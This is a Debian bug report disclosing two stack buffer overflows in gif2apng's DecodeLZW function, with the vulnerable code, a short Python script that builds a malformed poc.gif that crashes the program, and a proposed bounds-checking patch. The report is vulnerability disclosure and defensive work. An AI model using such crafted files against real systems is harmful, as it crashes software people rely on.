Bug#1002669: gif2apng: Two stack based buffer overflows in the DecodeLZW function

To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Bug#1002669: gif2apng: Two stack based buffer overflows in the DecodeLZW function
From: Kolja Grassmann <koljagrassmann@mailbox.org>
Date: Mon, 27 Dec 2021 00:12:12 +0100 (CET)
Message-id: <[🔎] 1214255817.552188.1640560332713@office.mailbox.org>
Reply-to: Kolja Grassmann <koljagrassmann@mailbox.org>, 1002669@bugs.debian.org

Package: gif2apng
Version: 1.9+srconly-3
Severity: normal
Tags: security

Dear Maintainer,

There are two stack based buffer overflows in the gif2apng application. The responsible code is located in the DecodeLZW function and looks as follows:

void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added
parameter img_size
{
  int i, bits, codesize, codemask, clearcode, nextcode, lastcode;
  unsigned int   j;
  unsigned int   size = 0;
  unsigned int   accum = 0;
  unsigned short prefix[4097];
  unsigned char  suffix[4097];
  unsigned char  str[4097];
  unsigned char  data[1024];
  unsigned char  firstchar = 0;
  unsigned char *pstr = str;
  unsigned char *pout = img;
  unsigned char  mincodesize;

  if (fread(&mincodesize, 1, 1, f1) != 1) return;

  bits = 0;
  codesize = mincodesize + 1;
  codemask = (1 << codesize) - 1;
  clearcode = 1 << mincodesize;
  nextcode = clearcode + 2;
  lastcode = -1;

  for (i=0; i<clearcode; i++)
    suffix[i] = i;
[...]
        while (code >= clearcode)
        {
          *pstr++ = suffix[code];
          code = prefix[code];
        }

In both loops at the end it is possible to write over the boundaries of the buffer by providing certain values a part of the gif file. For the for loop we can provide a large value for mincodesize leading to a clearcode bigger than 4097 and therefore overflowing the buffer. In the while loop we can provide code values, that repeat so that prefix[code] results in the same code again.

I wrote the following script to generate a poc.gif file:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" *
9
f.write(beginning)


mincode = b"\x07"
# Uncomment the following line to trigger the other crash
# mincode = b"\x10"
f.write(mincode)

# Size value and byte we write to the heap
target_char = b"\x01" + b"\xff\xfe"*10000
f.write(target_char)

f.close()

The poc.gif file generated by the script does trigger the overflow in the while loop. If the other value for mincode is used it should trigger the overflow in the for loop. Using the poc.gif file as follows led to a segmentation fault:
$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
Speicherzugriffsfehler

As I see no way to control the data, that is written in the loops I do not think, that this can necessarily exploited to gain code execution.

I fixed the issue locally by introducing a variable, that keeps track of the amount of data written to the pstr pointer and by doing some boundary checks before writing to the buffers:

if (clearcode > 4097) { // Added to avoid stack overflow here
    printf("Invalid Image\n");
    exit(0);
  }
  for (i=0; i<clearcode; i++)
    suffix[i] = i;
[...]
        if (code >= nextcode)
        {
          if ( write_counter <= 4097) { // Added to fix stack overflow here
            *pstr++ = firstchar;
            write_counter++;
            code = lastcode;
          }
          else {
            printf("Invalid Image\n");
            exit(0);
          }
        }

        while (code >= clearcode)
        {
          if ( write_counter <= 4097) { // Added to fix stack overflow here
            *pstr++ = suffix[code];
            write_counter++;
            code = prefix[code];
          }
          else {
            printf("Invalid Image\n");
            exit(0);
          }
        }
        if ( write_counter <= 4097) { // Added to fix stack overflow here
          *pstr++ = firstchar = suffix[code];
          write_counter++;
        }
        else {
          printf("Invalid Image\n");
          exit(0);
        }

This seemed to fix the issue for me locally, but it could use some more testing.

Best regards
Kolja





-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

Reply to:

Prev by Date: Processed: tagging 1002668, tagging 1002667, tagging 1002621
Next by Date: Processed: tagging 1002669
Previous by thread: Processed: tagging 1002668, tagging 1002667, tagging 1002621
Next by thread: Processed: tagging 1002669
Index(es):
- Date
- Thread